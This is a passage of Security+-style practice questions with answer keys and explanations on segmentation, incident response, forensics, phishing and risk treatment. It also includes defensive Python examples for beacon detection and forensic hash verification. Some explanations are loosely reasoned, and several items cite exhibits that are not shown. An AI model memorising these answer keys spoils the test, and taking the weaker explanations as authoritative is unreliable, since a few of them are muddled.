Option A is wrong because deploying active-active servers across multiple regions with load balancing provides high availability but at significantly higher cost due to redundant active infrastructure in multiple geographic locations, which exceeds the 'lowest-cost' requirement. Option C is wrong because nightly backups with restore only after outage confirmation does not provide continuous availability; it results in significant downtime (potentially hours or days) and data loss (up to 24 hours of transactions), failing the 'continue operating' requirement. Option D is wrong because RAID protects only against local disk failures, not against server failure (e.g., motherboard, power supply) or site outage (e.g., power loss, network cut), so it does not meet the survivability requirement.

495
MCQ · medium

A hospital is redesigning its wireless network. Guest devices must reach only the internet. Staff laptops need access to internal applications. Medical devices must communicate with a monitoring server but never with guest devices or the broader employee LAN. What design best meets these goals with the least operational complexity?

A.Place all devices on one flat network and rely on endpoint antivirus for protection.
B.Create separate VLANs for guest, staff, and medical devices, then enforce traffic rules between them with firewall policies.
C.Use a single wireless SSID with client isolation enabled and NAT all traffic through one gateway.
D.Deploy network access control only at login time and allow all devices onto the same internal subnet afterward.
Answer: B

This approach provides clean segmentation while keeping administration manageable. Separate VLANs define distinct trust zones, and firewall policies or ACLs control exactly which services can cross boundaries. That lets guest traffic stay internet-only, staff reach approved internal apps, and medical devices communicate only with the monitoring server.

Why this answer

Option B is correct because VLANs logically segment the network into isolated broadcast domains for guest, staff, and medical devices, while firewall policies (e.g., using ACLs or stateful inspection) enforce granular traffic rules. This design ensures medical devices can only communicate with the monitoring server, guests are restricted to internet-only access, and staff can reach internal applications, all without requiring complex physical reconfiguration.

Exam trap

The trap here is that candidates may choose client isolation (Option C) thinking it provides security, but it breaks required device-to-server communication and does not enforce role-based access, whereas VLANs with firewall policies offer precise, scalable segmentation.

How to eliminate wrong answers

Option A is wrong because a flat network with only endpoint antivirus provides no network-level segmentation, allowing guest devices to potentially access staff or medical systems, violating isolation requirements. Option C is wrong because a single SSID with client isolation prevents all device-to-device communication, which would block legitimate traffic between medical devices and the monitoring server, and NAT alone does not enforce access controls between device groups. Option D is wrong because network access control only at login time (e.g., 802.1X authentication) does not enforce ongoing traffic restrictions; after authentication, all devices share the same subnet, allowing unauthorized communication between guest, staff, and medical devices.

496
MCQ · medium

A security analyst detects an encrypted outbound connection from a web server to an unknown IP address. The connection is persistent and occurs every 5 minutes. What is the MOST appropriate first step for the analyst to take?

A.Disconnect the server from the network immediately.
B.Block the IP address at the perimeter firewall.
C.Review the server's process list and logs to identify the source.
D.Escalate the incident to the incident response team.
Answer: C

This is the correct first step. By examining the process list and logs (e.g., system, firewall, and application logs), the analyst can determine the specific process or service responsible for the outbound connection, assess whether it is malicious, and gather evidence for further investigation or escalation.

Why this answer

Option C is correct because the first step in investigating an unknown encrypted outbound connection is to identify the process or service responsible for initiating it. Reviewing the server's process list and logs allows the analyst to determine whether the connection is legitimate (e.g., a scheduled update or backup) or malicious (e.g., a beacon from implanted malware). Without this visibility, actions like blocking or disconnecting could disrupt legitimate services or alert an attacker prematurely.

Exam trap

The trap here is that candidates often jump to containment (disconnect or block) without first performing local analysis, failing to recognize that the initial step in incident response is always identification and scoping before containment.

How to eliminate wrong answers

Option A is wrong because immediately disconnecting the server from the network is an aggressive containment step that should only be taken after confirming malicious activity; it can cause unnecessary downtime and data loss if the connection is benign. Option B is wrong because blocking the IP address at the perimeter firewall is a reactive measure that does not address the root cause—the unknown process on the server—and the attacker could simply use a different IP or domain. Option D is wrong because escalation to the incident response team is premature before gathering initial evidence; the analyst should first perform local investigation to confirm the nature of the connection and collect relevant data for a proper handoff.
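A connection that recurs every five minutes with almost no variation is the beaconing pattern this question describes, and it is easy to confirm from the firewall or flow logs before touching the server. The detector below is an added example, not code from the page or from any tool; the log lines are constructed in a syslog-like format for the example, with the suspect destination 198.51.100.77 and a legitimate but irregular package mirror 192.0.2.50 for contrast. It groups connections by source, destination and port, then flags groups whose inter-arrival times are nearly constant:

```python
"""Beacon detection over firewall log lines: find (src, dst, port) groups
whose connection intervals are nearly constant.

Added example; not code from the page. Log lines are constructed.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) fw: (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def _fmt(epoch: float) -> str:
    return datetime.fromtimestamp(epoch, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def constructed_log():
    """Constructed sample: a 300-second beacon with small jitter, plus
    irregular traffic to a package mirror from the same web server."""
    base = datetime(2024, 5, 1, 10, 0, tzinfo=timezone.utc).timestamp()
    lines = []
    for i, jitter in enumerate([0, 2, -1, 1, 0, 3, -2, 1]):
        lines.append(f"{_fmt(base + 300 * i + jitter)} web01 fw: ALLOW TCP "
                     f"10.0.5.20:{49152 + i} -> 198.51.100.77:443")
    for i, offset in enumerate([0, 41, 600, 611, 1900]):
        lines.append(f"{_fmt(base + offset)} web01 fw: ALLOW TCP "
                     f"10.0.5.20:{50000 + i} -> 192.0.2.50:443")
    return lines


def parse(lines):
    """Return {(src, dst, dport): [epoch timestamps]} for lines that match."""
    conns = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        conns[(m["src"], m["dst"], int(m["dport"]))].append(ts.timestamp())
    return conns


def find_beacons(lines, min_hits=4, max_cv=0.05):
    """Flag groups with at least min_hits connections whose inter-arrival
    coefficient of variation (stdev / mean) is at most max_cv. Returns
    {(src, dst, dport): mean_interval_seconds}."""
    result = {}
    for key, times in parse(lines).items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            result[key] = round(mean)
    return result


if __name__ == "__main__":
    print(find_beacons(constructed_log()))
```

Once a periodic pair is confirmed, the next step on the host is exactly what the correct answer says: tie the destination to a process, for example with `ss -tnp` on Linux or `netstat -ano` on Windows, and check whether that process and its binary belong there before deciding on containment. Real implants often add random jitter, so a threshold looser than 5 percent and a check on consistent connection sizes help in practice.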

497
Multi-Select · hard

An investigator receives a suspect laptop that may be needed in court. The goal is to create a forensic image without changing the original drive contents. Which three actions best support chain of custody and evidence integrity? Select three.

Select 3 answers
A.Use a hardware write blocker during acquisition so the original disk cannot be modified.
B.Record cryptographic hash values for both the original media and the forensic image.
C.Document every transfer of the laptop, including who had custody, when, and why.
D.Browse the original disk using the operating system file explorer to confirm the case folder is present.
E.Store the suspect drive and the forensic copy in the same unlocked folder to simplify access.
Answers: A, B, C

A write blocker prevents accidental or intentional writes to the original media during imaging. That is one of the most important controls for protecting evidence integrity. It helps show that the original drive remained unchanged while the forensic image was created.

Why this answer

A hardware write blocker (A) is essential because it physically prevents any write commands from reaching the suspect drive at the SATA/IDE or USB level, ensuring the original disk's contents remain unaltered during acquisition. This is a foundational requirement for maintaining evidence integrity in forensic imaging, as any modification could render the evidence inadmissible in court. Recording cryptographic hash values (B) for both the original media and the image lets anyone later prove that the image is bit-for-bit identical to the source and that neither has changed since acquisition; the hashes should be computed with a strong algorithm such as SHA-256 and recorded in the case notes. Documenting every transfer (C), including who had custody, when, and why, is the chain of custody itself: without an unbroken record, opposing counsel can argue the evidence was accessible to someone who could have altered it.

Exam trap

The trap here is that candidates may think browsing the original disk is harmless or that storing evidence together is convenient, but both actions violate core forensic principles of preserving original evidence and maintaining a clear chain of custody.
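The two record-keeping answers (hashes and custody documentation) can be shown in a few lines. The code below is an added example, not code from the page or from any forensic tool: the "drive" is an in-memory byte buffer standing in for a device read through a write blocker, the image is verified by SHA-256 against the original, and the custody log is a simple hash chain in which each entry commits to the previous one, so an edited entry is detectable. Names and the case details are made up for the example.

```python
"""Forensic image verification and a tamper-evident custody log.

Added example; not code from the page or from any forensic suite. The drive
is an in-memory buffer; custody entries and names are constructed.
"""
import hashlib
import json


def sha256_of(data: bytes, chunk_size: int = 4096) -> str:
    """Hash in chunks, as you would stream a multi-terabyte device."""
    h = hashlib.sha256()
    for i in range(0, len(data), chunk_size):
        h.update(data[i:i + chunk_size])
    return h.hexdigest()


def acquire_image(original: bytes, acquired_at: str):
    """Bit-for-bit copy plus an acquisition record. A real acquisition reads
    the device through a hardware write blocker; here that is represented by
    never mutating `original`."""
    image = bytes(original)
    record = {
        "acquired_at": acquired_at,
        "original_sha256": sha256_of(original),
        "image_sha256": sha256_of(image),
    }
    return image, record


def verify_image(original: bytes, image: bytes, record: dict) -> bool:
    """True only if source, image and the recorded hashes all agree."""
    return (sha256_of(original) == record["original_sha256"]
            == sha256_of(image) == record["image_sha256"])


GENESIS = "0" * 64


def _entry_hash(entry: dict) -> str:
    body = {k: v for k, v in entry.items() if k != "entry_hash"}
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def record_transfer(log: list, who: str, action: str, reason: str, when: str) -> dict:
    """Append a custody event that commits to the previous event's hash."""
    prev = log[-1]["entry_hash"] if log else GENESIS
    entry = {"when": when, "who": who, "action": action,
             "reason": reason, "prev_hash": prev}
    entry["entry_hash"] = _entry_hash(entry)
    log.append(entry)
    return entry


def custody_intact(log: list) -> bool:
    """Recompute every link; any edited or removed entry breaks the chain."""
    prev = GENESIS
    for e in log:
        if e["prev_hash"] != prev or _entry_hash(e) != e["entry_hash"]:
            return False
        prev = e["entry_hash"]
    return True


if __name__ == "__main__":
    drive = bytes(range(256)) * 40            # constructed "device" contents
    img, rec = acquire_image(drive, "2024-05-01T11:45:00Z")
    print(verify_image(drive, img, rec), rec["image_sha256"][:16])
    log = []
    record_transfer(log, "J. Doe", "seized laptop", "search warrant", "2024-05-01T09:00:00Z")
    record_transfer(log, "A. Lee", "received for imaging", "lab intake", "2024-05-01T11:30:00Z")
    print(custody_intact(log))
```

Hash the source media before and after imaging as well as the image itself; a mismatch between the two source hashes is the evidence that something wrote to the drive despite the blocker, which is exactly the situation this question is designed to avoid.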

498
MCQ · medium

A company can patch only one of two internet-facing systems this week. System 1 has a critical vulnerability but is reachable only through the corporate VPN during maintenance windows. System 2 has a medium vulnerability and supports the public payment site, which shows active attack traffic every day. Which system should be prioritized first?

A.System 1, because the vulnerability is rated critical
B.System 2, because it is exposed to the public and directly supports a business-critical service
C.Neither system, because both are internet-facing and must wait for the next maintenance cycle
D.System 1, because VPN access always makes a vulnerability more dangerous than a public application issue
Answer: B

System 2 should be patched first because risk depends on both exposure and business impact. A medium issue on a public payment site with active attacks presents a higher real-world risk than a critical issue on a system with narrower access. The payment service is also directly tied to revenue and customer trust, so delaying its remediation would create greater business exposure.

Why this answer

System 2 should be prioritized because it is directly exposed to the public internet and supports a business-critical payment service that is under active attack daily. Even though System 1 has a critical vulnerability, it is only reachable through the corporate VPN during maintenance windows, which significantly reduces its attack surface and exploitability. In risk management, the likelihood of exploitation and business impact often outweigh the CVSS base score alone, making System 2 the higher priority.

Exam trap

The trap here is that candidates fixate on the CVSS critical rating (System 1) and ignore the crucial context of attack surface and active threat, leading them to choose A instead of applying risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because it focuses solely on the CVSS severity rating (critical) without considering the reduced attack surface due to VPN-only access, which lowers the actual risk. Option C is wrong because delaying patching for both systems ignores the immediate threat to the public-facing payment service under active attack, violating the principle of prioritizing based on risk and business impact. Option D is wrong because VPN access does not inherently make a vulnerability more dangerous; in fact, it restricts the attack vector to authenticated users, whereas a public-facing system is exposed to the entire internet, including automated attack traffic.

499
MCQ · medium

An organization is redesigning its office network. Guest Wi-Fi must reach the internet only, employee laptops need access to internal apps, and a payment-processing system must be separated from general user traffic but still reach one database server. Which design best meets these requirements?

A.Place all devices on one flat network and rely on host firewalls for isolation.
B.Create separate VLANs or subnets for guest, user, and payment zones, then filter inter-zone traffic with firewalls or ACLs.
C.Put the payment system in a DMZ and allow direct internet access for database synchronization.
D.Use NAT on every endpoint so internal devices cannot be individually identified on the network.
AnswerB

Separate zones with internal filtering limit lateral movement and allow only required flows.

Why this answer

Option B is correct because it uses VLANs or subnets to segment guest, employee, and payment-processing traffic into separate broadcast domains, then applies firewall rules or ACLs to control inter-zone traffic. This allows guest Wi-Fi to be restricted to internet-only access, employee laptops to reach internal apps, and the payment system to communicate only with its specific database server while being isolated from general user traffic.

Exam trap

The trap here is that candidates often think a DMZ is always the correct answer for any sensitive system, but in this scenario, the payment system needs controlled access to an internal database, not internet exposure, making VLAN segmentation with firewalls the proper design.

How to eliminate wrong answers

Option A is wrong because a single flat network provides no segmentation; host firewalls alone cannot enforce network-level isolation between guest, employee, and payment traffic, leaving the payment system exposed to all other devices. Option C is wrong because placing the payment system in a DMZ with direct internet access for database synchronization violates the requirement to separate it from general user traffic and introduces unnecessary exposure to the internet, whereas the database should be accessed only via controlled internal paths. Option D is wrong because NAT on every endpoint does not provide network segmentation or access control; it only hides internal IP addresses, failing to isolate guest, employee, and payment traffic or restrict their communication paths.

500
MCQ · medium

Based on the exhibit, which architecture best meets the goal of keeping the order service running if one application server fails?

A. Use one active server with a warm standby server that is started manually during outages.
B. Run the application servers active-active behind the load balancer.
C. Store the application binaries on RAID 1 disks to prevent service interruption.
D. Take nightly backups of the application servers and restore them after a failure.
Answer: B

Active-active design keeps service available because surviving servers continue handling traffic automatically.

Why this answer

Option B is correct because an active-active architecture behind a load balancer ensures that if one application server fails, the load balancer automatically redirects traffic to the remaining healthy server(s). This provides high availability and fault tolerance without manual intervention, keeping the order service running continuously.

Exam trap

The trap here is that candidates often confuse data redundancy (RAID 1) with server-level fault tolerance, or they mistake backup strategies (nightly backups) for high-availability solutions, failing to recognize that only active-active or active-passive clustering with automatic failover meets the requirement of uninterrupted service during a server failure.

How to eliminate wrong answers

Option A is wrong because a warm standby server that is started manually introduces significant downtime (minutes to hours) while an administrator detects the failure and brings the standby online, failing the goal of keeping the service running during a failure. Option C is wrong because RAID 1 (mirroring) protects against disk failure but does not address application server failure; if the server itself crashes or its OS/application becomes unresponsive, the mirrored disks are still inaccessible. Option D is wrong because nightly backups are a disaster recovery measure, not a high-availability solution; restoring from backup can take hours and results in data loss from the last backup point, so the service would be interrupted for an extended period.

501
Multi-Select · hard

A SIEM correlation rule fires for a Microsoft 365 executive mailbox. At 02:14, the account signs in from a new country. At 02:17, the mailbox gets a forwarding rule that sends all mail to an external address. The user says they did not travel and did not create any rules. Which two log sources should the analyst review first to confirm whether this is account takeover or token abuse? Select two.

Select 2 answers
A. Identity provider sign-in logs, because they show source IP, MFA status, and session creation details.
B. Mailbox audit logs, because they record rule creation, forwarding changes, and other post-login mail actions.
C. DHCP lease logs, because they identify the internal workstation that first received the suspicious email.
D. Print server logs, because mailbox forwarding often causes documents to be printed unexpectedly.
E. Physical badge-access logs, because they prove whether the user was in the office when the login occurred.
Answers: A, B

Identity provider sign-in logs are the fastest way to validate where the session came from, whether MFA succeeded, and whether a token or session was issued. That helps distinguish a legitimate login from suspicious access. They also provide the baseline needed to correlate later mailbox activity with the same identity.

Why this answer

Option A is correct because identity provider sign-in logs (e.g., Azure AD sign-in logs) capture the source IP address, MFA status, and session details. In this scenario, reviewing these logs can reveal if the sign-in at 02:14 came from an unusual IP or lacked MFA, indicating a potential account takeover rather than token abuse.

Exam trap

The trap here is that candidates may overlook the need to check both sign-in and mailbox audit logs, assuming one log source alone can distinguish between account takeover and token abuse, when in fact the combination of identity provider logs and mailbox audit logs is required to correlate the sign-in session with the rule creation action.

502
MCQ · medium

A system administrator must run a weekly patch-and-restart job on 80 Linux servers without logging in interactively. The job should be repeatable, auditable, and limited to only the required maintenance commands. What is the best approach?

A. Share a root SSH key with the operations team so anyone can run the job.
B. Use a configuration management tool with a dedicated service account and restricted sudo permissions.
C. Have each administrator log in manually and run the commands from an interactive shell.
D. Create a local root account on every server for maintenance tasks.
Answer: B

This supports repeatable automation, centralized auditing, and least privilege by allowing only the needed maintenance actions.

Why this answer

B is correct because configuration management tools (e.g., Ansible, Puppet, or SaltStack) allow you to define a repeatable, auditable patch-and-restart job using a dedicated service account with restricted sudo permissions. This approach enforces the principle of least privilege, logs all actions via the tool's job history, and eliminates the need for interactive login, meeting all requirements for automation, auditability, and command restriction.

Exam trap

The trap here is that candidates may choose Option A (shared root SSH key) because it seems convenient for automation, but they overlook the critical security and auditability requirements that make configuration management with a restricted service account the only correct choice.

How to eliminate wrong answers

Option A is wrong because sharing a root SSH key violates the principle of least privilege and non-repudiation — anyone with the key can execute arbitrary commands as root without an audit trail of who ran what. Option C is wrong because manual interactive login on 80 servers is not repeatable, introduces human error, and fails to provide a centralized audit log; it also violates the requirement to avoid interactive login. Option D is wrong because creating a local root account on every server increases the attack surface, makes key management and auditing nearly impossible, and directly contradicts the need for a restricted, auditable process.

503
MCQ · medium

Based on the exhibit, what is the best cloud identity control to ensure terminated users lose access to the SaaS application quickly and consistently?

A. Keep the SaaS local user accounts and require the help desk to disable them manually after each termination.
B. Enable federated authentication with the corporate IdP and automate provisioning and deprovisioning with SCIM.
C. Create a shared emergency administrator account so access can be revoked by changing one password.
D. Require users to clear browser cookies after termination so the SaaS session expires sooner.
Answer: B

Federation centralizes authentication in the corporate identity provider, and SCIM automates account lifecycle changes based on HR events. That means terminations, transfers, and new hires can be reflected quickly in the SaaS application without relying on manual email tickets. This reduces orphaned accounts and improves consistency across the cloud environment.

Why this answer

Option B is correct because federated authentication with a corporate identity provider (IdP) combined with SCIM (System for Cross-domain Identity Management) ensures that when a user is terminated in the IdP (e.g., Active Directory or Azure AD), the SaaS application is automatically notified via SCIM to deprovision the user account. This eliminates manual intervention and guarantees consistent, near-instant revocation of access across all federated SaaS applications.

Exam trap

The trap here is that candidates often confuse session management (clearing cookies) with account deprovisioning, or they assume manual processes are acceptable for security, when the exam emphasizes automation and centralized identity management for consistency and speed.

How to eliminate wrong answers

Option A is wrong because keeping local SaaS accounts and manually disabling them via the help desk introduces human delay and inconsistency, violating the principle of automated, timely deprovisioning. Option C is wrong because a shared emergency administrator account does not address individual user termination; changing one password would affect all administrators, not just the terminated user, and violates non-repudiation and least privilege. Option D is wrong because clearing browser cookies only ends the current session on that specific browser; it does not revoke the user's underlying account or prevent re-authentication from other devices, and the user could simply log in again.

504
MCQ · medium

A security analyst detects unusual outbound traffic from a workstation to an external IP address known for command and control. The analyst has verified the alert and wants to contain the threat. According to the NIST SP 800-61 incident response process, which of the following steps should the analyst take FIRST?

A. Disconnect the workstation from the network
B. Perform a forensic analysis of the workstation
C. Reimage the workstation
D. Alert the system administrator
Answer: A

This is correct because it directly implements containment by isolating the compromised workstation, preventing further data exfiltration or lateral movement.

Why this answer

According to NIST SP 800-61, the first step in containment during incident response is to prevent further damage by isolating the compromised system. Disconnecting the workstation from the network immediately stops the outbound command-and-control traffic, preventing data exfiltration and further compromise. This aligns with the 'containment' phase before any analysis or remediation occurs.

Exam trap

The trap here is that candidates often confuse the order of incident response phases, choosing forensic analysis (Option B) first instead of containment, because they mistakenly believe evidence preservation must precede network isolation.

How to eliminate wrong answers

Option B is wrong because performing a forensic analysis is part of the 'eradication' or 'post-incident' phase, not the first containment step; analyzing the system while it is still connected risks further data loss or attacker interference. Option C is wrong because reimaging the workstation destroys evidence and is a remediation step that should only occur after containment and forensic preservation. Option D is wrong because alerting the system administrator is a communication step that may happen in parallel, but the immediate technical containment action—disconnecting the network—takes priority to stop active malicious traffic.

505
MCQ · hard

Based on the exhibit, which document should be created or updated to make these settings mandatory and measurable?

Exhibit:

Endpoint baseline draft:
- Full-disk encryption should be enabled on all corporate laptops.
- Screen lock should activate after 15 minutes of inactivity.
- Users should choose strong passwords.

Related documents:
- Policy: Acceptable Use Policy
- Standard: none
- Procedure: Laptop imaging steps
- Guideline: Suggested hardening tips

A. Update the policy because policies are always the most detailed technical documents.
B. Create or update a standard because it defines mandatory, specific minimum requirements.
C. Update the procedure because procedures are the best place for corporate requirements.
D. Update the guideline because guidelines are the strongest way to enforce compliance.
Answer: B

A standard turns high-level intent into enforceable baseline requirements that can be tested and audited consistently.

Why this answer

A standard defines mandatory, specific minimum requirements that must be met, such as 'full-disk encryption enabled' and 'screen lock after 15 minutes.' Unlike policies (high-level intent) or guidelines (suggestions), a standard provides measurable criteria that can be audited and enforced. Creating or updating a standard makes the endpoint baseline settings mandatory and measurable.

Exam trap

The trap here is confusing the role of a policy (broad intent) with a standard (specific, mandatory requirements), leading candidates to choose 'Update the policy' because they assume policies are the most authoritative document for technical settings.

How to eliminate wrong answers

Option A is wrong because policies are high-level statements of intent, not detailed technical requirements; they lack the specificity needed for measurable enforcement. Option C is wrong because procedures describe step-by-step instructions for tasks (e.g., laptop imaging), not mandatory requirements that apply to all endpoints. Option D is wrong because guidelines are advisory recommendations, not enforceable mandates, and thus cannot make settings mandatory or measurable.

506
MCQ · easy

Based on the exhibit, what type of malware is most likely present?

A. Ransomware, because the files are being renamed and recovery copies are being deleted.
B. Adware, because documents are no longer opening correctly.
C. Rootkit, because the system is using a command-line utility.
D. Spyware, because the attacker wants to read user documents.
Answer: A

The combination of shadow copy deletion, mass file renaming, and a ransom note is a strong match for ransomware. The attacker is attempting to prevent recovery while demanding payment or coercing the victim, which is exactly the pattern shown in the exhibit.

Why this answer

The exhibit shows files being renamed with a new extension and recovery copies (shadow copies) being deleted via vssadmin.exe. This is a classic ransomware behavior: encrypting user files and removing Volume Shadow Copy backups to prevent recovery without the attacker's key. Ransomware specifically targets document files and system restore points to maximize extortion leverage.

Exam trap

The trap here is that candidates see 'command-line utility' and think rootkit, but vssadmin deletion is a hallmark of ransomware, not a rootkit's stealth or persistence mechanism.

How to eliminate wrong answers

Option B is wrong because adware typically displays unwanted advertisements or redirects browser traffic, not renames files or deletes shadow copies; document opening issues here are a symptom of encryption, not adware. Option C is wrong because a rootkit hides its presence and provides privileged access, but using a command-line utility like vssadmin is a common ransomware action, not indicative of rootkit functionality. Option D is wrong because spyware covertly collects user data (keystrokes, browsing habits) without altering files; the attacker renaming and deleting backups points to encryption for ransom, not passive data theft.

507
MCQ · medium

A help desk technician receives an SMS claiming to be from the mobile carrier. The message says the user's corporate number will be suspended unless they open a link and confirm an MFA code. The user has not reported any account issues. What attack is this?

A. Spear phishing
B. Smishing
C. Vishing
D. Baiting
Answer: B

Smishing is phishing delivered through SMS, and the attacker is using urgency and a fake carrier notice to steal credentials or MFA codes.

Why this answer

Smishing is a phishing attack conducted via SMS (Short Message Service). The message impersonates the mobile carrier, creates urgency by threatening suspension, and lures the user to a malicious link to capture MFA codes or credentials. Since the attack vector is SMS, not email or voice, this is smishing.

Exam trap

The trap here is confusing the delivery method (SMS vs. email vs. voice) — candidates often pick 'spear phishing' because the message is personalized, but the defining characteristic is the SMS channel, which makes it smishing.

How to eliminate wrong answers

Option A is wrong because spear phishing is a targeted email-based attack that uses personalized information to trick a specific individual, not an SMS message. Option C is wrong because vishing (voice phishing) is conducted over phone calls, not text messages.

508
MCQ · medium

A development team wants to deploy a new internal application without managing operating system patching, runtime updates, or automatic scaling. The security team still wants the company to control the application code and its data access settings. Which cloud service model best fits this need?

A. Infrastructure as a Service, because the company can ignore guest OS patching entirely.
B. Platform as a Service, because the provider manages the platform and the company manages the application and data.
C. Software as a Service, because the team can deploy custom application code inside the vendor portal.
D. On-premises hosting, because the company can still use the provider's patching tools.
Answer: B

PaaS shifts patching and scaling responsibilities to the provider while preserving customer control over code, configurations, and data.

Why this answer

Platform as a Service (PaaS) is the correct choice because the provider manages the underlying platform—including OS patching, runtime updates, and automatic scaling—while the company retains control over the application code and data access settings. This aligns with the shared responsibility model where the customer is responsible for the application and data, not the infrastructure.

Exam trap

The trap here is that candidates confuse PaaS with IaaS, assuming 'no patching' means IaaS, but IaaS still requires the customer to patch the guest OS and runtime, whereas PaaS fully offloads that responsibility.

How to eliminate wrong answers

Option A is wrong because Infrastructure as a Service (IaaS) requires the customer to manage guest OS patching and runtime updates, contradicting the team's desire to avoid those tasks. Option C is wrong because Software as a Service (SaaS) does not allow the customer to deploy custom application code; it only provides pre-built applications accessed via a vendor portal. Option D is wrong because on-premises hosting places full responsibility for patching and scaling on the company, not the provider, and does not eliminate the need for OS management.

509
MCQ · medium

After several employees clicked on phishing emails, management wants to reduce future click rates and show measurable improvement across finance, HR, and executive assistants. Which control best meets that goal?

A. Send a one-time company-wide memo reminding users not to click suspicious links.
B. Use role-based security awareness training with phishing simulations and metrics tracking.
C. Disable all external email attachments for every department indefinitely.
D. Require employees to complete annual policy acknowledgment without testing.
Answer: B

Role-based awareness training with phishing simulations is the best fit because it directly targets user behavior and lets the security team measure results. Different job roles face different lures, so tailoring content to finance, HR, and executive assistants improves relevance. Tracking click rates, report rates, and repeat offenders also shows whether the program is working and supports continuous improvement.

Why this answer

Option B is correct because role-based security awareness training with phishing simulations and metrics tracking directly addresses the human factor by tailoring content to specific job roles (finance, HR, executive assistants) and provides measurable improvement through simulation click-rate data. This approach aligns with the NIST SP 800-50 framework for continuous security awareness, enabling management to track reduction in click rates over time.

Exam trap

The trap here is that candidates often choose Option A or D because they equate 'training' with a one-time communication or annual sign-off, failing to recognize that measurable improvement requires simulation, role-specific content, and ongoing metrics tracking as specified in the CompTIA SY0-701 objectives for security awareness programs.

How to eliminate wrong answers

Option A is wrong because a one-time memo lacks reinforcement, metrics, and simulation, so it cannot provide measurable improvement or change long-term behavior. Option C is wrong because disabling all external email attachments for every department indefinitely is overly restrictive, breaks legitimate business workflows (e.g., finance receiving invoices, HR receiving resumes), and does not train users to recognize phishing. Option D is wrong because annual policy acknowledgment without testing or simulation does not measure actual user behavior or reduce click rates; it only confirms policy receipt, not comprehension or application.

510
MCQ · medium

An engineering tool runs on an unsupported operating system, but the tool is used only occasionally and can be replaced by a supported cloud service with little workflow impact. Which risk treatment is best?

A. Accept the risk because the tool is old and still functions
B. Transfer the risk to the cloud provider without making changes
C. Avoid the risk by retiring the unsupported system and replacing it with the supported service
D. Compensate for the risk by adding more user passwords
Answer: C

Avoiding the risk is the best treatment because the organization has a practical replacement that does not significantly disrupt the workflow. Retiring the unsupported system removes the vulnerability source instead of merely reducing exposure. When a lower-risk alternative is available and business impact is manageable, elimination of the risk is often better than accepting or compensating for it.

Why this answer

Option C is correct because the best risk treatment for an unsupported operating system that is only used occasionally and can be replaced with minimal workflow impact is to avoid the risk entirely. By retiring the unsupported system and migrating to the supported cloud service, the organization eliminates the security vulnerabilities and compliance issues associated with the outdated OS. This aligns with the risk avoidance strategy, which is preferred when the cost of mitigation is low and the risk is high.

Exam trap

The trap here is that candidates may confuse risk acceptance with a viable option when the tool 'still functions,' failing to recognize that unsupported systems pose an active security threat that cannot be safely accepted without compensating controls.

How to eliminate wrong answers

Option A is wrong because accepting the risk for an unsupported operating system ignores the lack of security patches, leaving the system vulnerable to exploits that could compromise the entire network. Option B is wrong because transferring the risk to a cloud provider without making changes implies that the unsupported system remains in place, and risk transfer typically involves insurance or contracts, not simply using a cloud service without migration. Option D is wrong because compensating with more user passwords does not address the core issue of an unsupported OS; password policies cannot patch kernel vulnerabilities or missing security updates.

511
Multi-Select · medium

An organization is updating its security policies to align with modern threats and compliance requirements. Which of the following are key security concepts that should be explicitly addressed in these updated policies? (Choose four.)

Select 4 answers
A. Data classification and handling procedures to protect sensitive information
B. Incident response procedures to ensure a structured approach to security events
C. Change management processes to control modifications to systems and configurations
D. Password complexity and rotation requirements for all user accounts
E. Requiring all employees to use the same shared administrative account for efficiency
F. Allowing unrestricted personal device usage on the corporate network without controls

Why this answer

Data classification and handling procedures are correct because they define how sensitive information is identified, labeled, and protected throughout its lifecycle, which is essential for compliance with regulations like GDPR or HIPAA. Incident response procedures are correct because they provide a structured, repeatable process (e.g., NIST SP 800-61) to detect, contain, eradicate, and recover from security events, minimizing damage. Change management processes are correct because they ensure that all system and configuration changes are reviewed, approved, and documented, reducing the risk of unauthorized or misconfigured changes that could introduce vulnerabilities.

Password complexity and rotation requirements are correct because they enforce strong authentication practices, mitigating brute-force and credential-stuffing attacks, though modern guidance (NIST SP 800-63B) emphasizes length and complexity over arbitrary rotation.

Exam trap

The exam often tests the misconception that password rotation is always required. Modern guidance (NIST SP 800-63B) recommends rotation only when compromise is suspected and focuses instead on password length and multi-factor authentication, yet candidates must also recognize that rotation remains a valid policy element under many compliance frameworks.

512
MCQ · medium

A finance application has a known vulnerability in a third-party reporting component. The vendor says a patch will not be available for six months, but the business cannot stop using the application. What is the BEST risk treatment for the organization to pursue next?

A. Avoid the risk by shutting down the finance application immediately.
B. Mitigate the risk by adding compensating controls and tracking residual risk until the patch is available.
C. Transfer the risk by asking the vendor to guarantee that no incident will occur.
D. Accept the risk because any delay in patching is automatically low priority.
Answer: B

This approach reduces the likelihood or impact of exploitation while keeping the business service running. Compensating controls such as increased monitoring, segmentation, additional access restrictions, and temporary workarounds are appropriate when a patch is unavailable. The organization can then document the remaining risk, assign an owner, and revisit the issue when the vendor releases the fix.

Why this answer

Option B is correct because when a known vulnerability exists in a third-party component and patching is delayed, the best risk treatment is to implement compensating controls (such as network segmentation, WAF rules, or input validation) to reduce the likelihood or impact of exploitation. This approach allows the business to continue operations while actively tracking residual risk until the vendor releases the patch. It aligns with the NIST risk management framework, which prioritizes mitigation when avoidance is not feasible.

Exam trap

The trap here is that candidates confuse 'accepting risk' with 'doing nothing,' but in CompTIA's framework, risk acceptance requires a formal decision by management after evaluating the risk level, not an automatic deferral due to a delayed patch.

How to eliminate wrong answers

